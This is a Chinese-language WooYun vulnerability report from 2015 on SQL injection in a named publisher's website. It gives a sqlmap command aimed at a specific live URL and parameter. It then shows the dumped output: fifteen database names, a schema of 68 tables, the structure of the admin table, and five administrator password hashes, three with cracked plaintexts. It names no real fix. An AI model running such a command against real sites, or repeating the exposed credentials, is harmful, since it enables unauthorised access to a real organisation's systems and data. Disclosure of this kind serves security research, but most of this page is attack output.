当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145563

漏洞标题:中文传媒SQL注射/管理密码暴露/信息疑似泄露/涉及15库

相关厂商:中文传媒

漏洞作者: 冷白开。

提交时间:2015-10-09 18:33

修复时间:2015-11-23 18:34

公开时间:2015-11-23 18:34

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中文传媒SQL注射/管理密码暴露/信息疑似泄露/涉及15库

详细说明:

sqlmap.py -u "http://www.600373.net/mainpages/vedio.aspx?LessType=MD102" --dbs

1.png

available databases [15]:
[*] [zwcm_2011(old)]
[*] BookData
[*] BookExport
[*] DownloadBook
[*] HXS
[*] jxpp_2008
[*] jxpp_2012
[*] KCDB_2013
[*] master
[*] model
[*] msdb
[*] NetPerfMon
[*] PublishingResources
[*] tempdb
[*] zwcm_2014
Database: zwcm_2014
[68 tables]
+--------------------------+
| AccessCount |
| AdminDep_Less |
| AdminDep_Main |
| AdminInfo |
| AdminOperateLog |
| AdminRole |
| AdminRole_OtherList |
| BaseColumn |
| BaseInfo |
| BaseType |
| BookBinding |
| BookCLC |
| BookClass |
| BookComment |
| BookInfo |
| BookInfo_ForeignLanguage |
| BookInfo_Type |
| BookKind |
| BookLanguage |
| BookPress |
| BookPress_Type |
| BookReply |
| BookSerialize_Chapter |
| BookSerialize_Section |
| BookType_Less |
| BookType_Main |
| CityInfo |
| DBBackup |
| ImageInfo |
| ImageType_Less |
| ImageType_Main |
| InviteInfo |
| InviteInfo_User |
| LinkInfo |
| LinkType |
| Magazine |
| MagazineInfo |
| MagazineInfo_E |
| MagazineInfo_Graph |
| MagazineInfo_Type |
| MagazineType_Less |
| MagazineType_Main |
| MediaInfo |
| MediaType |
| MerchantCollection |
| MerchantOrder |
| MerchantOrder_Book |
| MerchantOrder_Rate |
| MerchantShopping |
| MessageInfo |
| MessageType |
| NewsAdjunct |
| NewsInfo |
| NewsInfo_Type |
| NewsReply |
| NewsType_Less |
| NewsType_Main |
| PeopleInfo |
| PeopleType |
| RssNews |
| RssNews_Type |
| RssType_Less |
| RssType_Main |
| UserGold_Supply |
| UserInfo |
| UserType |
| VoteInfo |
| VoteType |
+--------------------------+
Database: zwcm_2014
Table: AdminInfo
[13 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| AdminDepment | nvarchar |
| AdminEndDate | datetime |
| AdminID | nvarchar |
| AdminName | nvarchar |
| AdminPass | nvarchar |
| AdminRole | nvarchar |
| AdminVerify | nvarchar |
| ID | int |
| IFForEver | int |
| IFLocked | int |
| LastOnlineDate | datetime |
| LockEndDate | datetime |
| RegisterDate | datetime |
+----------------+----------+
Database: zwcm_2014
Table: AdminInfo
[5 entries]
+-------------------------------------------+
| AdminPass |
+-------------------------------------------+
| 0a424597916704e0e84c7fcde50a9a7d |
| ab65df7928af8f15c71eeb3ff1363029 |
| ce8b4367aa4f8057dc8f20c65db45437 (810520) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| f379eaf3c831b04de153469d1bec345e (666666) |
+-------------------------------------------+

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评价